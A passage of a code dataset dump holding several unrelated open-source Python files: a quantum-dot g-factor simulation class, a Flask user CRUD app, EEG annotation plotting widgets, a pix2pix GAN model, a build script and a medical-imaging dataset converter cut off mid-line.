1].anti)\n return self.calcs[i].anti < min_neighbor\n\n # List of E-field triplets\n def E_list_minimum(self, i):\n return [self.calcs[i + x].E_z for x in [-1, 0, 1]]\n\n # E-field difference around a minimum\n def E_diff_minimum(self, i):\n return self.calcs[i + 1].E_z - self.calcs[i - 1].E_z\n\n # Check if the structure has a minimum\n @property\n def has_minimum(self):\n return self.minimum is not None\n\n ###########################################################################\n # Update properties #\n ###########################################################################\n\n # Update limits\n def update_limits(self):\n # Update if calculations list is not empty, otherwise do nothing\n if self.calcs:\n # Decrease left side limit\n if self.limits[0] + self.options.limit_update > self.calcs[0].E_z:\n self.limits[0] = self.calcs[0].E_z - self.options.limit_update\n # Increase right side limit\n if self.limits[1] - self.options.limit_update < self.calcs[-1].E_z:\n self.limits[1] = self.calcs[-1].E_z + self.options.limit_update\n\n # Update ranges, both outer and inner\n def update_ranges(self):\n self.update_range(outer=True)\n self.update_range(outer=False)\n\n # Update either outer or inner range\n def update_range(self, outer=True):\n # Set to the default range\n range = self.limits[:]\n\n # Define values for definitions\n limit = self.options.limit\n low_lim_l = ((1 - limit) if outer else (1 - limit))\n up_lim_l = limit if outer else 0.0\n low_lim_r = limit\n up_lim_r = (1.0 - limit) if outer else 1.0\n\n # Compare every calculation to define ranges\n left_range_found = False\n for calc in self.calcs:\n # Left side range\n if calc.local_low > low_lim_l and calc.local_up > up_lim_l:\n if not left_range_found:\n range[0] = calc.E_z\n else:\n left_range_found = True\n # Right side range\n if calc.local_low < low_lim_r:\n if calc.local_up < up_lim_r:\n if range[1] == self.limits[1]:\n range[1] = calc.E_z\n # Exit as range is already found\n break\n # Assign newly found range\n if outer:\n self.outer_range = tuple(range)\n else:\n self.inner_range = tuple(range)\n\n @property\n def E_min(self):\n return self.minimum.E_z\n\n def update_minimum(self):\n self.minimum = None\n self.minimum_index = None\n self.E_min_diff = None\n for i, calc in enumerate(self.calcs[1:-1]):\n if self.in_range_exclusive(calc.E_z, False):\n if calc.anti > self.calcs[i].anti:\n continue\n if calc.anti > self.calcs[i + 2].anti:\n continue\n if self.minimum is None or calc.anti < self.minimum.anti:\n self.minimum = calc\n self.E_min_diff = self.calcs[i + 2].E_z - self.calcs[i].E_z\n self.minimum_index = i + 1\n\n ###########################################################################\n # Output and infos #\n ###########################################################################\n\n def title(self, outer):\n return \"outer\" if outer else \"inner\"\n\n def range_confidence(self, outer):\n return encase([percent(i) for i in self.gap(outer)])\n\n @property\n def opt_Ez_piezo(self):\n left_outer, right_outer = self.outer_range\n left_inner, right_inner = self.inner_range\n left = abs(left_outer - left_inner)\n right = abs(right_outer - right_inner)\n if left > right:\n return (left_outer * 0.5 + left_inner * 0.5)\n else:\n return (right_outer * 0.5 + right_inner * 0.5)\n\n ##########################################################################\n # Other misc. #\n ##########################################################################\n\n # Epsilon factor for kp calculations\n def eps_factor(self, outer):\n return self.options.eps_factor_for_outer if outer else 1\n\n # Sort calculations, if there are any\n def sort_per_Ez(self):\n if self.calcs:\n self.calcs.sort()\n\n # Check if calculation belongs to the structure\n def calc_belongs(self, calc):\n # Structure number is correct\n if self.n_str == calc.n_str:\n # In-plane electric field is correct\n if close(self.E_x, calc.E[0]) and close(self.E_y, calc.E[1]):\n # Magnetic field is correct\n if (close(self.B[0], calc.B[0]) and close(self.B[1], calc.B[1])\n and close(self.B[2], calc.B[2])):\n return True\n return False\n\n # Deleted repeated records\n def remove_repeats(self):\n i = 0 # Counter variable\n # Go over all pairs of neighbors\n while i < len(self.calcs) - 1:\n # If E_z is the same remove record due to unnecessary repeat\n # This increases counter by decreasing list length\n if self.calcs[i].E_z == self.calcs[i + 1].E_z:\n # if self.projectname == \"E_field\":\n # echo(self.projectname+\"\\t\" +str(self.calcs[i].n_str) + \"\\t\" + str(self.calcs[i].n_calc))\n self.calcs.pop(i)\n # Else increase counter\n else:\n i += 1\n\n @property\n def gfactors(self):\n if self.additional is not None:\n return [self.additional.g_low, self.additional.g_up]\n return [None, None]\n\n @property\n def gfactors_sign_diff(self):\n if self.additional is not None:\n return self.gfactors[0] * self.gfactors[1] < 0.0\n return None\n\n @property\n def piezo(self):\n return self.additional.piezo\n\n @property\n def gfactor_diff(self):\n if self.gfactors[0] is None:\n return None\n return self.gfactors[0] - self.gfactors[1]\n\n @property\n def gfactor_sum(self):\n return sum(self.gfactors)\n\n @property\n def theta(self):\n return arccos(self.B_z)\n\n @property\n def phi(self):\n if self.B_x == self.B_y == 0.0:\n return 0.0\n else:\n return arctan2(self.B_y, self.B_x)\n\n @property\n def n(self):\n n = 1 if self.additional is None else 0\n # if \"gtensor\" in self.sim.output_filename:\n # return 1 if self.additional is None else 0\n # if self.options.calc_additional:\n # return 1 if self.additional is None else 0\n for outer, left in product([True, False], repeat=2):\n bounds = self.gap(outer)\n bounds_factor = self.bounds_factor(outer, left)\n x = bounds[left % 2] / self.options.bound_limit * bounds_factor\n n += max(int(ceil(log2(x))), 0)\n for i, bound in enumerate(self.right):\n bound *= self.bounds_right[i] / self.options.right_limit\n if bound > 0:\n n += max(int(ceil(log2(bound))), 0)\n # Loop over all triplets of neighboring points\n if self.has_minimum:\n x = self.E_min_diff / self.options.minima_eps\n n += min(max(int(ceil(log2(x)/3)), 0), 5)\n return n\n\n @property\n def x_axis(self):\n if \"B_field_gfactor\" in self.sim.output_filename:\n return self.B_val\n elif \"rotate\" in self.projectname:\n return self.angle\n elif \"anticrossing_gfactor\" in self.sim.output_filename:\n return self.B_val\n elif self.projectname == \"E_field\":\n if self.E_x < 0 and self.E_y < 0:\n return -sqrt(self.E_x**2 + self.E_y**2)\n return sqrt(self.E_x**2 + self.E_y**2)\n elif \"shift\" in self.projectname:\n if \"compensation\" in self.sim.output_filename:\n if self.E_x < 0 and self.E_y < 0:\n return - sqrt(self.E_x**2 + self.E_y**2)\n elif self.E_y == 0:\n return self.E_x\n return sqrt(self.E_x**2 + self.E_y**2)\n else:\n i = self.n_str - 1\n if self.n_str == 23:\n i = 0.5\n if self.n_str == 24:\n i = 1.5\n i = i * 2 # / 6.0 * 5.65\n if \"110\" in self.projectname:\n return i * sqrt(2)\n if \"100\" in self.projectname:\n return i\n elif \"diffc\" in self.projectname:\n return 0.15 + 0.05 * self.n_str if self.n_str <= 17 else 0.05 * (self.n_str - 17)\n elif \"diffH\" in self.projectname:\n return 84 + 6 * self.n_str\n elif \"topvar\" in self.projectname:\n return -84 + 12 * self.n_str\n elif \"downvar\" in self.projectname:\n return -72 + 12 * self.n_str if self.n_str != 13 else -72\n elif \"diffD\" in self.projectname:\n return 3 * self.n_str\n elif \"diffR\" in self.projectname:\n return 78 + 6 * self.n_str\n elif \"elong\" in self.projectname:\n if \"E110\" in self.sim.output_filename:\n if self.E_x < 0 and self.E_y < 0:\n return -sqrt(self.E_x**2 + self.E_y**2)\n return sqrt(self.E_x**2 + self.E_y**2)\n elif \"E100\" in self.sim.output_filename:\n return self.E_x\n elif \"_100\" in self.projectname:\n if self.n_str < 12:\n return 0.4 + 0.1 * self.n_str\n elif self.n_str == 13:\n return 1.05\n elif 14 <= self.n_str <= 18:\n return 0.2 + 0.1 * self.n_str\n elif 19 <= self.n_str <= 23:\n return -1.35 + 0.1 * self.n_str\n elif \"_110\" in self.projectname:\n if self.n_str <= 16:\n return 0.4 + 0.1 * self.n_str\n elif 17 <= self.n_str <= 21:\n return -1.15 + 0.1 * self.n_str\n else:\n assert False, \"Error, \" + self.projectname + \" doesn't work!\"\n\n @property\n def angle(self):\n assert \"rotate\" in self.projectname, self.projectname\n if \"shift\" in self.projectname:\n # return 50 - 5 * self.n_str if self.n_str <= 10 else 32.5 - 5 * (self.n_str - 16)\n if self.n_str <= 10 :\n return 50 - 5 * self.n_str\n elif self.n_str <= 22:\n return 32.5 - 5 * (self.n_str - 16)\n elif self.n_str <= 33:\n return 83.75 - 2.5 * self.n_str\n elif self.n_str == 34:\n return 1.875\n elif self.n_str == 35:\n return 0.625\n else: # Elongation along real x with shifting crystal\n if self.n_str <= 10:\n return 50 - 5 * self.n_str\n elif self.n_str <= 14:\n return 15 - self.n_str\n elif self.n_str == 15:\n return 7.5\n elif self.n_str == 16:\n return 12.5\n elif self.n_str == 17:\n return 16\n elif self.n_str == 18:\n return 14\n elif self.n_str == 19:\n return 13\n elif self.n_str == 20:\n return 17\n elif self.n_str < 24:\n return -5 * (self.n_str - 20)\n elif self.n_str == 24:\n return 15.9412\n elif self.n_str == 25:\n return 15.8824\n elif self.n_str == 26:\n return 15.9446\n elif self.n_str == 27:\n return 50\n elif self.n_str == 28:\n return 11.25\n elif self.n_str == 29:\n return 8.75\n elif self.n_str == 30:\n return 6.25\n","repo_name":"MatKrzykowski/gfactor","sub_path":"structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":34522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10822743600","text":"from flask_app import app\nfrom flask import render_template, request, redirect, session, flash\nfrom flask_app.models.user import User\n\n@app.route('/')\ndef dashboard():\n return render_template(\"dashboard.html\")\n\n\n@app.route('/createUser', methods = ['POST'])\ndef createUser():\n data = {\n 'first_name' : request.form['first_name'],\n 'last_name' : request.form['last_name'],\n 'email' : request.form['email']\n }\n User.add_user(data)\n return redirect('/showInfo')\n\n\n#this shows info about all users\n@app.route('/showInfo')\ndef showInfo():\n users = User.getAllUsers()\n return render_template(\"showInfo.html\", users = users)\n\n\n\n#this shows info about a specific user which we get it by his id\n@app.route('/showUser/')\ndef userInfo(id):\n data = {\n 'id' : id\n }\n \n return render_template(\"showUser.html\", users = User.getUserById(data))\n\n@app.route('/edit/')\ndef functiontoedit(id):\n data = {\n 'id': id\n }\n return render_template(\"editUser.html\", users = User.getUserById(data))\n\n@app.route('/editUser/', methods = ['POST'])\ndef updateUser(id):\n data = {\n 'first_name' : request.form['first_name'],\n 'last_name' : request.form['last_name'],\n 'email' : request.form['email'],\n 'id': id\n }\n User.updateUser(data)\n return redirect('/showInfo')\n\n@app.route('/deleteUser/')\ndef deleteSomeUser(id):\n data = {\n 'id': id\n }\n User.deleteUser(data)\n return redirect('/showInfo')\n\n\n","repo_name":"BlertaKola/flask_mysql_users","sub_path":"flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43567753067","text":"from PyQt5 import QtCore, QtWidgets, QtGui\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox\nimport matplotlib.pyplot as plt\n\nimport pyqtgraph as pg\nimport matplotlib.ticker as ticker\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport pyqtgraph as pg # We will try using pyqtgraph for plotting\nimport time\nimport mne\n# from superqt import QDoubleRangeSlider\nfrom tqdm import tqdm\nimport os\nfrom src.hfo_app import HFO_App\nfrom src.hfo_feature import HFO_Feature\n\nfrom src.utils.utils_annotation import *\n\nimport random\nimport scipy.fft as fft #FFT plot (5)\nimport scipy.signal as signal\nimport numpy as np\n\nimport re\nfrom pathlib import Path\nfrom src.hfo_app import HFO_App\nfrom src.param.param_classifier import ParamClassifier\nfrom src.param.param_detector import ParamDetector, ParamSTE, ParamMNI\nfrom src.param.param_filter import ParamFilter\nfrom src.utils.utils_gui import *\nfrom src.ui.plot_waveform import *\n# import FormatStrFormatter\nfrom matplotlib.ticker import FormatStrFormatter\n\n\n# from src.ui.plot_annotation_waveform import *\n# from src.ui.a_channel_selection import AnnotationChannelSelection \n\n# from src.plot_time_frequency import PlotTimeFrequencyNoLabel\nfrom src.utils.utils_plotting import *\n# from src.plot_time_frequency import MainWindow\n\nimport multiprocessing as mp\nimport torch\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\n#import fft \nimport scipy.fft as fft\n\n\ndef custom_formatter(x, pos):\n # if number >1000, then use scientific notation but still fix the width to 5\n max_width = 5\n if abs(x) > 1000:\n return f'{x:.0e}'\n # 4 digits + 1 for potential negative sign\n formatted_number = f' {x:.0f}' if x >= 0 else f'{x:.0f}'\n return f'{formatted_number:>{max_width}}'\n\nclass AnnotationPlot(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=10, height=4, dpi=100, hfo_app=None):\n fig,self.axs = plt.subplots(3,1,figsize=(width, height), dpi=dpi)\n super(AnnotationPlot, self).__init__(fig)\n self.hfo_app = hfo_app\n FigureCanvasQTAgg.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n # self.setParent(parent)\n # self.plot()\n\n def plot(self,start_index: int = None, end_index: int = None, channel:str = None):\n #first clear the plot\n for ax in self.axs:\n ax.cla()\n # check if the index are in correct range\n if None:\n return\n if start_index < 0:\n return\n if start_index < 0:\n start_index = self.index\n\n channel_name = channel\n # print(\"this is channel: \", channel)\n # print(\"this is channel_name: \", channel_name)\n \n #both sets of data (filtered/unfiltered) for plots\n length = self.hfo_app.get_eeg_data_shape()[1]\n fs = self.hfo_app.sample_freq\n window_start_index, window_end_index, relative_start_index, relative_end_end = calcuate_boundary(start_index, end_index, length,fs)\n unfiltered_eeg_data, self.channel_names = self.hfo_app.get_eeg_data(window_start_index, window_end_index)\n filtered_eeg_data,_ = self.hfo_app.get_eeg_data(window_start_index, window_end_index, filtered=True)\n\n unfiltered_eeg_data_to_display_one = unfiltered_eeg_data[self.channel_names == channel_name,:][0]\n filtered_eeg_data_to_display = filtered_eeg_data[self.channel_names == channel_name,:][0]\n # print(\"window_start_index: \", window_start_index)\n # print(\"window_end_index: \", window_end_index)\n # print(\"relative_start_index: \", relative_start_index)\n # print(\"relative_end_end: \", relative_end_end)\n time_to_display = np.arange(0, unfiltered_eeg_data_to_display_one.shape[0])/fs+window_start_index/fs\n # print(\"this is time to display: \", time_to_display.shape)\n # print(\"this is unfiltered_eeg_data_to_display_one: \", unfiltered_eeg_data_to_display_one.shape)\n # print(\"this is filtered_eeg_data_to_display: \", filtered_eeg_data_to_display.shape)\n self.axs[0].set_title(\"EEG Tracing\")\n self.axs[0].plot(time_to_display, unfiltered_eeg_data_to_display_one, color='blue')\n self.axs[0].plot(time_to_display[relative_start_index:relative_end_end], unfiltered_eeg_data_to_display_one[relative_start_index:relative_end_end], color='orange')\n self.axs[0].set_xticks([])\n # keep the y axis label fixed (not moving when the plot is updated)\n \n self.axs[0].set_ylabel('Amplitude (uV)', rotation=90, labelpad=5)\n self.axs[0].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n #self.axs[0].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[0].yaxis.set_label_position(\"right\")\n #self.axs[0].grid()\n # print(\"this is time to display: \", time_to_display.shape)\n # print(\"this is filtered_eeg_data_to_display: \", filtered_eeg_data_to_display.shape)\n self.axs[1].set_title(\"Filtered Tracing\")\n self.axs[1].plot(time_to_display, filtered_eeg_data_to_display, color='blue')\n self.axs[1].plot(time_to_display[relative_start_index:relative_end_end], filtered_eeg_data_to_display[relative_start_index:relative_end_end], color='orange')\n self.axs[1].set_ylabel('Amplitude (uV)', rotation=90, labelpad=6)\n self.axs[1].set_xticks([])\n self.axs[1].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n #self.axs[1].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[1].yaxis.set_label_position(\"right\")\n #self.axs[1].grid()\n\n time_frequency = calculate_time_frequency(unfiltered_eeg_data_to_display_one,fs)\n self.axs[2].set_title(\"Time Frequency\")\n self.axs[2].imshow(time_frequency,extent=[time_to_display[0], time_to_display[-1], 10, 500], aspect='auto', cmap='jet')\n # set xticks as time\n self.axs[2].set_xticks(np.linspace(time_to_display[0], time_to_display[-1], 5))\n self.axs[2].set_xticklabels(np.round(np.linspace(time_to_display[0], time_to_display[-1], 5),1))\n # set yticks as frequency\n self.axs[2].set_yticks(np.linspace(10, 500, 5).astype(int))\n self.axs[2].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n self.axs[2].set_xlabel('Time (s)')\n self.axs[2].set_ylabel('Frequency (Hz)', rotation=90, labelpad=4)\n #self.axs[2].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[2].yaxis.set_label_position(\"right\")\n \n\n #share x axis\n #self.axs[0].sharex(self.axs[1])\n # self.axs[0].sharex(self.axs[2])\n #self.axs[1].sharex(self.axs[2])\n #call the draw function\n plt.tight_layout()\n self.draw()\n \nclass FFTPlot(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=5, height=4, dpi=100, hfo_app=None):\n fig,self.axs = plt.subplots(1,1,figsize=(width, height), dpi=dpi)\n super(FFTPlot, self).__init__(fig)\n self.hfo_app = hfo_app\n \n FigureCanvasQTAgg.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n \n def plot(self,start_index: int = None, end_index: int = None, channel:str = None):\n self.axs.cla()\n start_index = int(start_index)\n end_index = int(end_index)\n unfiltered_eeg_data, channel_names = self.hfo_app.get_eeg_data(start_index, end_index)\n unfiltered_eeg_data = unfiltered_eeg_data[channel_names == channel,:][0]\n # filtered_eeg_data,_ = self.hfo_app.get_eeg_data(start_index, end_index, filtered=True)\n #compute the fft\n fs = self.hfo_app.sample_freq\n\n f, Pxx_den = signal.periodogram(unfiltered_eeg_data, fs)\n # greater than 10 Hz\n f_plot = f\n Pxx_den_plot = Pxx_den\n self.axs.semilogy(f_plot, Pxx_den_plot)\n self.axs.set_xlabel('Frequency (Hz)')\n self.axs.set_ylabel(r\"PSD (V$^2$/Hz)\")\n self.axs.set_ylim([1e-7, 1e3])\n self.axs.set_xlim([0, 500])\n self.axs.grid()\n plt.tight_layout()\n self.draw()\n \n \n \n \n \n \n\n \n","repo_name":"roychowdhuryresearch/pyHFO","sub_path":"src/ui/annotation_plot.py","file_name":"annotation_plot.py","file_ext":"py","file_size_in_byte":8647,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"12088224513","text":"import torch\nimport models.networks as networks\nimport util.util as util\n\n\nclass Pix2PixModel(torch.nn.Module):\n @staticmethod\n def modify_commandline_options(parser, is_train):\n networks.modify_commandline_options(parser, is_train)\n return parser\n\n def __init__(self, opt):\n super().__init__()\n self.opt = opt\n self.FloatTensor = torch.cuda.FloatTensor if self.use_gpu() else torch.FloatTensor\n self.ByteTensor = torch.cuda.ByteTensor if self.use_gpu() else torch.ByteTensor\n\n self.netG, self.netD, self.netE = self.initialize_networks(opt)\n\n # set loss functions\n if opt.isTrain:\n self.criterionGAN = networks.GANLoss(opt.gan_mode, tensor=self.FloatTensor, opt=self.opt)\n self.criterionFeat = torch.nn.L1Loss()\n if not opt.no_vgg_loss:\n self.criterionVGG = networks.VGGLoss(self.opt.gpu_ids)\n if opt.use_vae:\n self.KLDLoss = networks.KLDLoss()\n\n # Entry point for all calls involving forward pass\n # of deep networks. We used this approach since DataParallel module\n # can't parallelize custom functions, we branch to different\n # routines based on |mode|.\n def forward(self, data, mode):\n input_semantics, real_image, degraded_image = self.preprocess_input(data)\n\n if mode == \"generator\":\n g_loss, generated = self.compute_generator_loss(input_semantics, degraded_image, real_image)\n return g_loss, generated\n elif mode == \"discriminator\":\n d_loss = self.compute_discriminator_loss(input_semantics, degraded_image, real_image)\n return d_loss\n elif mode == \"encode_only\":\n z, mu, logvar = self.encode_z(real_image)\n return mu, logvar\n elif mode == \"inference\":\n with torch.no_grad():\n fake_image, _ = self.generate_fake(input_semantics, degraded_image, real_image)\n return fake_image\n else:\n raise ValueError(\"|mode| is invalid\")\n\n def create_optimizers(self, opt):\n G_params = list(self.netG.parameters())\n if opt.use_vae:\n G_params += list(self.netE.parameters())\n if opt.isTrain:\n D_params = list(self.netD.parameters())\n\n beta1, beta2 = opt.beta1, opt.beta2\n if opt.no_TTUR:\n G_lr, D_lr = opt.lr, opt.lr\n else:\n G_lr, D_lr = opt.lr / 2, opt.lr * 2\n\n optimizer_G = torch.optim.Adam(G_params, lr=G_lr, betas=(beta1, beta2))\n optimizer_D = torch.optim.Adam(D_params, lr=D_lr, betas=(beta1, beta2))\n\n return optimizer_G, optimizer_D\n\n def save(self, epoch):\n util.save_network(self.netG, \"G\", epoch, self.opt)\n util.save_network(self.netD, \"D\", epoch, self.opt)\n if self.opt.use_vae:\n util.save_network(self.netE, \"E\", epoch, self.opt)\n\n ############################################################################\n # Private helper methods\n ############################################################################\n\n def initialize_networks(self, opt):\n netG = networks.define_G(opt)\n netD = networks.define_D(opt) if opt.isTrain else None\n netE = networks.define_E(opt) if opt.use_vae else None\n\n if not opt.isTrain or opt.continue_train:\n netG = util.load_network(netG, \"G\", opt.which_epoch, opt)\n if opt.isTrain:\n netD = util.load_network(netD, \"D\", opt.which_epoch, opt)\n if opt.use_vae:\n netE = util.load_network(netE, \"E\", opt.which_epoch, opt)\n\n return netG, netD, netE\n\n # preprocess the input, such as moving the tensors to GPUs and\n # transforming the label map to one-hot encoding\n # |data|: dictionary of the input data\n\n def preprocess_input(self, data):\n # move to GPU and change data types\n # data['label'] = data['label'].long()\n\n if not self.opt.isTrain:\n if self.use_gpu():\n data[\"label\"] = data[\"label\"].cuda()\n data[\"image\"] = data[\"image\"].cuda()\n return data[\"label\"], data[\"image\"], data[\"image\"]\n\n ## While testing, the input image is the degraded face\n if self.use_gpu():\n data[\"label\"] = data[\"label\"].cuda()\n data[\"degraded_image\"] = data[\"degraded_image\"].cuda()\n data[\"image\"] = data[\"image\"].cuda()\n\n # # create one-hot label map\n # label_map = data['label']\n # bs, _, h, w = label_map.size()\n # nc = self.opt.label_nc + 1 if self.opt.contain_dontcare_label \\\n # else self.opt.label_nc\n # input_label = self.FloatTensor(bs, nc, h, w).zero_()\n # input_semantics = input_label.scatter_(1, label_map, 1.0)\n\n return data[\"label\"], data[\"image\"], data[\"degraded_image\"]\n\n def compute_generator_loss(self, input_semantics, degraded_image, real_image):\n G_losses = {}\n\n fake_image, KLD_loss = self.generate_fake(\n input_semantics, degraded_image, real_image, compute_kld_loss=self.opt.use_vae\n )\n\n if self.opt.use_vae:\n G_losses[\"KLD\"] = KLD_loss\n\n pred_fake, pred_real = self.discriminate(input_semantics, fake_image, real_image)\n\n G_losses[\"GAN\"] = self.criterionGAN(pred_fake, True, for_discriminator=False)\n\n if not self.opt.no_ganFeat_loss:\n num_D = len(pred_fake)\n GAN_Feat_loss = self.FloatTensor(1).fill_(0)\n for i in range(num_D): # for each discriminator\n # last output is the final prediction, so we exclude it\n num_intermediate_outputs = len(pred_fake[i]) - 1\n for j in range(num_intermediate_outputs): # for each layer output\n unweighted_loss = self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach())\n GAN_Feat_loss += unweighted_loss * self.opt.lambda_feat / num_D\n G_losses[\"GAN_Feat\"] = GAN_Feat_loss\n\n if not self.opt.no_vgg_loss:\n G_losses[\"VGG\"] = self.criterionVGG(fake_image, real_image) * self.opt.lambda_vgg\n\n return G_losses, fake_image\n\n def compute_discriminator_loss(self, input_semantics, degraded_image, real_image):\n D_losses = {}\n with torch.no_grad():\n fake_image, _ = self.generate_fake(input_semantics, degraded_image, real_image)\n fake_image = fake_image.detach()\n fake_image.requires_grad_()\n\n pred_fake, pred_real = self.discriminate(input_semantics, fake_image, real_image)\n\n D_losses[\"D_Fake\"] = self.criterionGAN(pred_fake, False, for_discriminator=True)\n D_losses[\"D_real\"] = self.criterionGAN(pred_real, True, for_discriminator=True)\n\n return D_losses\n\n def encode_z(self, real_image):\n mu, logvar = self.netE(real_image)\n z = self.reparameterize(mu, logvar)\n return z, mu, logvar\n\n def generate_fake(self, input_semantics, degraded_image, real_image, compute_kld_loss=False):\n z = None\n KLD_loss = None\n if self.opt.use_vae:\n z, mu, logvar = self.encode_z(real_image)\n if compute_kld_loss:\n KLD_loss = self.KLDLoss(mu, logvar) * self.opt.lambda_kld\n\n fake_image = self.netG(input_semantics, degraded_image, z=z)\n\n assert (\n not compute_kld_loss\n ) or self.opt.use_vae, \"You cannot compute KLD loss if opt.use_vae == False\"\n\n return fake_image, KLD_loss\n\n # Given fake and real image, return the prediction of discriminator\n # for each fake and real image.\n\n def discriminate(self, input_semantics, fake_image, real_image):\n\n if self.opt.no_parsing_map:\n fake_concat = fake_image\n real_concat = real_image\n else:\n fake_concat = torch.cat([input_semantics, fake_image], dim=1)\n real_concat = torch.cat([input_semantics, real_image], dim=1)\n\n # In Batch Normalization, the fake and real images are\n # recommended to be in the same batch to avoid disparate\n # statistics in fake and real images.\n # So both fake and real images are fed to D all at once.\n fake_and_real = torch.cat([fake_concat, real_concat], dim=0)\n\n discriminator_out = self.netD(fake_and_real)\n\n pred_fake, pred_real = self.divide_pred(discriminator_out)\n\n return pred_fake, pred_real\n\n # Take the prediction of fake and real images from the combined batch\n def divide_pred(self, pred):\n # the prediction contains the intermediate outputs of multiscale GAN,\n # so it's usually a list\n if type(pred) == list:\n fake = []\n real = []\n for p in pred:\n fake.append([tensor[: tensor.size(0) // 2] for tensor in p])\n real.append([tensor[tensor.size(0) // 2 :] for tensor in p])\n else:\n fake = pred[: pred.size(0) // 2]\n real = pred[pred.size(0) // 2 :]\n\n return fake, real\n\n def get_edges(self, t):\n edge = self.ByteTensor(t.size()).zero_()\n edge[:, :, :, 1:] = edge[:, :, :, 1:] | (t[:, :, :, 1:] != t[:, :, :, :-1])\n edge[:, :, :, :-1] = edge[:, :, :, :-1] | (t[:, :, :, 1:] != t[:, :, :, :-1])\n edge[:, :, 1:, :] = edge[:, :, 1:, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])\n edge[:, :, :-1, :] = edge[:, :, :-1, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])\n return edge.float()\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps.mul(std) + mu\n\n def use_gpu(self):\n return len(self.opt.gpu_ids) > 0\n","repo_name":"microsoft/Bringing-Old-Photos-Back-to-Life","sub_path":"Face_Enhancement/models/pix2pix_model.py","file_name":"pix2pix_model.py","file_ext":"py","file_size_in_byte":9712,"program_lang":"python","lang":"en","doc_type":"code","stars":13933,"dataset":"github-code","pt":"77"} +{"seq_id":"23977914263","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\ntop = '../..'\n\ndef build(bld):\n\n bld.objects(\n target='ndn2peek-objects',\n source=bld.path.ant_glob('ndn2peek/*.cpp', excl='ndn2peek/main.cpp'),\n use='core-objects')\n\n bld.program(\n target='../../bin/vectorchat',\n source='simplechat.cpp',\n use=['core-objects', 'ndn2peek-objects'])\n\n","repo_name":"simzou/vector-chat","sub_path":"tools/simple-vector-chat/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21324040852","text":"from collections import OrderedDict\nfrom nnunet.paths import nnUNet_raw_data\nfrom batchgenerators.utilities.file_and_folder_operations import *\nimport shutil\n\n\nif __name__ == \"__main__\":\n #i used the CervixRawData.zip\n base = \"/home/constantin/Downloads/CervixRawData/RawData\"\n\n task_id = 18\n task_name = \"PelvicOrganSegmentation\"\n prefix = 'ABD'\n\n foldername = \"Task%03.0d_%s\" % (task_id, task_name)\n\n out_base = join(nnUNet_raw_data, foldername)\n imagestr = join(out_base, \"imagesTr\")\n imagests = join(out_base, \"imagesTs\")\n labelstr = join(out_base, \"labelsTr\")\n maybe_mkdir_p(imagestr)\n maybe_mkdir_p(imagests)\n maybe_mkdir_p(labelstr)\n\n train_folder = join(base, \"Training/img\")\n label_folder = join(base, \"Training/label\")\n test_folder = join(base, \"Testing/img\")\n train_patient_names = []\n test_patient_names = []\n train_patients = subfiles(train_folder, join=False, suffix = 'nii.gz')\n for p in train_patients:\n train_patient_name = p\n label_file = join(label_folder, p[:-13] + '-Mask.nii.gz')\n image_file = join(train_folder, p)\n shutil.copy(image_file, join(imagestr, p[:-7]+'_0000.nii.gz'))\n shutil.copy(label_file, join(labelstr, train_patient_name))\n train_patient_names.append(train_patient_name)\n\n test_patients = subfiles(test_folder, join=False, suffix=\".nii.gz\")\n for p in test_patients:\n test_patient_name = p\n image_file = join(test_folder, p)\n shutil.copy(image_file, join(imagests, p[:-7] + '_0000.nii.gz'))\n test_patient_names.append(test_patient_name)\n\n json_dict = OrderedDict()\n json_dict['name'] = \"PelvicOrganSegmentation\"\n json_dict['description'] = \"Multi-Atlas Labeling Beyond the Cranial Vault Abdominal Organ Segmentation\"\n json_dict['tensorImageSize'] = \"3D\"\n json_dict['reference'] = \"https://www.synapse.org/#!Synapse:syn3193805/wiki/217789\"\n json_dict['licence'] = \"see challenge website\"\n json_dict['release'] = \"0.0\"\n json_dict['modality'] = {\n \"0\": \"CT\",\n }\n json_dict['labels'] = OrderedDict({\n \"00\": \"background\",\n \"01\": \"bladder\",\n \"02\": \"uterus\",\n \"03\": \"rectum\",\n \"04\": \"small bowel\",}\n )\n json_dict['numTraining'] = len(train_patient_names)\n json_dict['numTest'] = len(test_patient_names)\n json_dict['training'] = [{'image': \"./imagesTr/%s\" % train_patient_name, \"label\": \"./labelsTr/%s\" % train_patient_name} for i, train_patient_name in enumerate(train_patient_names)]\n json_dict['test'] = [\"./imagesTs/%s\" % test_patient_name for test_patient_name in test_patient_names]\n\n save_json(json_dict, os.path.join(out_base, 